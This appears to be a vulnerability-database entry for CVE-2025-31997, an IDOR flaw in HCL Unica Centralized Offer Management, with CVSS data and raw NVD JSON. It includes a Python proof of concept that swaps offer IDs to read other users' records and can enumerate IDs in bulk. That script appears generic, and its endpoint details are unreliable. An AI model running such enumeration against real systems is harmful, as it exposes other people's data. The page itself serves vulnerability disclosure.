Security Vulnerability Report
CVE-2025-31997 CVSS 4.2 MEDIUM

CVE-2025-31997

Published: 2025-10-12 03:15:34
Last Modified: 2025-10-29 17:27:23

Description

HCL Unica Centralized Offer Management is vulnerable to Insecure Direct Object References (IDOR). An attacker can bypass authorization and access resources in the system directly, for example database records or files.

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL Unica Centralized Offer Management (for the specific affected versions, refer to HCL's official security advisory KB0124422)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-31997 - HCL Unica Centralized Offer Management IDOR PoC
# This PoC demonstrates the Insecure Direct Object References vulnerability
# that allows bypassing authorization to access restricted resources.
import requests

# Target configuration
TARGET_URL = "https://target-hcl-unica.example.com"
# Value of a valid JSESSIONID cookie for a high-privilege account (the cookie
# name is supplied separately below, so only the value goes here)
SESSION_COOKIE = "authenticated_session_cookie"


# Step 1: Normal request to access a legitimate resource
def normal_request(resource_id):
    """Send a normal authenticated request to view a resource"""
    url = f"{TARGET_URL}/unica/offer/centralized/viewOffer"
    params = {"offerId": resource_id}
    cookies = {"JSESSIONID": SESSION_COOKIE}
    response = requests.get(url, params=params, cookies=cookies, verify=False)
    return response


# Step 2: IDOR exploitation - modify the resource ID to access unauthorized resources
def exploit_idor(target_resource_id):
    """
    Exploit IDOR by changing the offerId parameter to access resources
    belonging to other users without proper authorization checks.
    """
    print(f"[*] Attempting to access resource ID: {target_resource_id}")
    response = normal_request(target_resource_id)
    if response.status_code == 200:
        print(f"[+] SUCCESS: Unauthorized access to resource {target_resource_id}")
        print(f"[+] Response data: {response.text[:500]}")
        # Extract sensitive data from the response
        if "offerName" in response.text or "customerData" in response.text:
            print(f"[!] Sensitive data exposed in resource {target_resource_id}")
        return response.text
    else:
        print(f"[-] Failed with status code: {response.status_code}")
        return None


# Step 3: Enumerate accessible resources by iterating through IDs
def enumerate_resources(start_id=1, end_id=100):
    """Enumerate all accessible resources via IDOR"""
    exposed_data = []
    for resource_id in range(start_id, end_id + 1):
        data = exploit_idor(resource_id)
        if data:
            exposed_data.append({"id": resource_id, "data": data})
    return exposed_data


# Main execution
if __name__ == "__main__":
    # Example: Access a resource that the current user should not have permission to view
    print("=== CVE-2025-31997 IDOR Exploitation PoC ===")
    # Attempt to access resource ID 9999 (likely belonging to another user)
    exploit_idor(9999)
    # Uncomment below to perform mass enumeration
    # enumerate_resources(1, 1000)
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124422 (Vendor Advisory, HCL KB0124422)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-31997",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-12T03:15:34.393",
    "lastModified": "2025-10-29T17:27:23.037",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HCL Unica Centralized Offer Management is vulnerable to Insecure Direct Object References (IDOR). An attacker can bypass authorization and access resources in the system directly, for example database records or files."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 4.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 0.5,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "25.1.0.1",
                "matchCriteriaId": "5542E4D6-1B72-44F5-8CFF-D31D47444299"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124422",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```